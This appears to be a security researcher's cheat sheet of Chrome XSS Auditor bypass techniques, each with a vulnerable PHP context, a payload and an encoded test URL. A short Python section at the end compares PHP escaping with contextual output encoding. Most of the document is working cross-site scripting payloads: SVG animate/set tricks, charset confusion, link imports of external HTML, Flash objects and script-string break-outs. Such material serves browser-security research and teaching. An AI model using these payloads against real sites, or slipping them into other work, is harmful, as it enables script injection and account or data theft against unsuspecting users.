Author: phith0n @ 長亭科技 (Chaitin Tech)
Universal Bypass 5
Latest Chrome 60
context == null
test:
http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Bypass 4 (requires user interaction)
Chrome 60
?c=<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
or
?c=<svg width=10000px height=10000px><a><rect width=10000px height=10000px z-index=9999999 /><animate attributeName=href values=javascript:alert(1)>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E
Bypass 3 via flash
Works on any Chrome version that still supports Flash (up to Chrome 56).
context == Flash supported
<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>
test
http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E
Universal Bypass 2
Works up to Chrome 55/56 with no preconditions: as long as the input is output into the page, code executes.
context == null
?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E
Universal Bypass 1
Works up to Chrome 55/56 with no preconditions: as long as the input is output into the page, code executes.
context == null
?xss=<link rel="import" href="https:www.leavesongs.com/testxss"
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22
Chrome 59 && a space follows the output point
context:
<?php header('X-XSS-Protection: 1; mode=block'); echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";
test
http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script
Chrome 44/45 + output inside an attribute
https://code.google.com/p/chromium/issues/detail?id=526104
Fixed in Chrome 45+
context:
<html> <head> <title>XSSAuditor bypass</title> </head> <body> <form> <input type="text" value="<?php echo isset($_GET['input']) ? $_GET['input'] : 'use ?input=foo'?>"> </form> </body> </html>
payload:
"><script>prompt(/XSS/);1%02<script</script>
test
http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E
Bypass when no charset is set
When the response declares no charset, you can specify a character set yourself to bypass the auditor.
In older versions the encoding ISO-2022-KR was available, and onerror%0f=alert(1) bypasses with it; current versions no longer ship that encoding, so that payload only works on old Chrome.
Newer versions have the encoding ISO-2022-JP: a %1B%28B inserted at the key position is dropped.
context:
<?php echo $_GET['xss'];
payload:
Old: xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%0f=alert(1)%3E
New: xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
Output inside an attribute, with a <script> following later
context:
<!doctype HTML> <img alt="<?php echo $_GET['xss']; ?>"> <script> y = "abc"; </script>
payload
xss="><script/src=data:,alert(1)%2b"
xss=%22%3E%3Cscript/src=data:,alert(document.domain)%2b%22
xss=%22%3E%3Cscript/src=data:,alert(1)%2b%22
xss=%22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol;
test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22
Two output points
context:
<?php
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."<br><br>";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."<br><br>";
?>
payload:
http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>
http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>
test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
Works on roughly all versions from before 2015-06-23.
context == any
payload:
xss=<svg><script>/<1/>alert(document.domain)</script></svg>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
Chrome 36~40: HTML import via <link> leads to bypass
Fixed on Oct 10, 2014 (in practice it still existed in early 2015).
https://code.google.com/p/chromium/issues/detail?id=421166
http://www.wooyun.org/bugs/wooyun-2010-090304
Importing external HTML via <link> bypasses the XSSAuditor.
context == any
payload
xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E
Output inside a string within a <script> block
If the string can be closed, just close it and write JavaScript, e.g.: http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
But what if the single quote cannot be closed? Take this context:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>all</title> <script type="text/javascript"> var a = '<?php echo addslashes($_GET["xss"]); ?>'; </script> </head> <body> 123 </body> </html>
payload
<script> x = "</script><svg><script>alert(1)+"";
<script> x = "</script><svg><script>alert(1)+'";
test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
Universal bypass with a controllable upload point
context:
There is a controllable upload point under the site's domain: I can upload a .txt or .js file or similar (anything that is not a media file works; for example, if the upload is validated with a blacklist, any made-up extension will do). Then reference the file from the src attribute of a script tag.
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
<?=json_encode($_GET['x'])?>
payload
?x=<img+src=x+onerror=`ö`-alert(1)>
Character replacement present
When the output point performs a character replacement before output (most characters, or whole strings, will do), with a context like this:
<?php
echo str_replace('"', '&quote;', $_REQUEST['name']);
echo str_replace('&', '&amp;', $_REQUEST['name']);
echo str_replace('//', '\\', $_REQUEST['name']);
echo str_replace('#', '#', $_REQUEST['name']);
echo str_replace('xxxx', 'b', $_REQUEST['name']);
you can include that character in the payload to bypass the auditor:
xss=<script>'"'/alert(1)</script>
test
http://mhz.pw/game/xss/amps.php?name=zx%3Cscript%3E%27%26%27/alert(1)%3C/script%3Eczxc
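Added Python example, not code from the page: it approximates PHP's addslashes() and json_encode() (an assumption about their behaviour on plain strings), mirrors the page's scriptaddslashes.php and json_encode contexts, and checks whether the rendered output breaks out of the intended context; the js_string_encode() encoder is the contextual output encoding that removes the need to rely on the XSS Auditor at all. Sample inputs are constructed from the payload shapes above.

```python
import json
import re

# Constructed sample inputs following the page's payload shapes (not the live test URLs).
SCRIPT_STRING_INPUT = "</script><svg><script>alert(1)+'"
JSON_INPUT = "<img src=x onerror=`ö`-alert(1)>"   # the non-ASCII char defeats auditor matching

def php_addslashes(s: str) -> str:
    """Re-implementation of PHP addslashes(): prefixes only ' \" \\ and NUL with a backslash."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))

def js_string_encode(s: str) -> str:
    """Contextual encoder for a JS string literal inside <script>: everything except
    ASCII letters, digits and space becomes \\xHH or \\uHHHH, so the value can
    terminate neither the string nor the enclosing <script> element."""
    out = []
    for ch in s:
        cp = ord(ch)
        if cp < 0x80 and (ch.isalnum() or ch == " "):
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)

def php_json_encode(s: str, hex_tag: bool = False) -> str:
    """Approximation of PHP json_encode() on a string: '/' becomes '\\/' and non-ASCII
    becomes \\uXXXX by default; hex_tag mimics the JSON_HEX_TAG flag, which also turns
    '<' and '>' into \\u003C / \\u003E so no HTML tag can appear in the output."""
    enc = json.dumps(s, ensure_ascii=True).replace("/", "\\/")
    if hex_tag:
        enc = enc.replace("<", "\\u003C").replace(">", "\\u003E")
    return enc

def render_script_page(value: str, encoder) -> str:
    """Mirror of the page's scriptaddslashes.php template: var a = '<value>';"""
    return f"<script>var a = '{encoder(value)}';</script>"

def script_closed_early(page_html: str) -> bool:
    """The HTML tokenizer ends a <script> element at the first '</script' regardless of
    JS quoting, so any such sequence inside the intended script text is a break-out."""
    inner = page_html[len("<script>"):-len("</script>")]
    return re.search(r"</script", inner, re.IGNORECASE) is not None

def emits_html_tag(encoded: str) -> bool:
    """For the bare json_encode context: a literal '<' in the output can start a tag."""
    return "<" in encoded
```

Running the four checks shows addslashes() and default json_encode() both leave a break-out in place, while js_string_encode() and JSON_HEX_TAG do not.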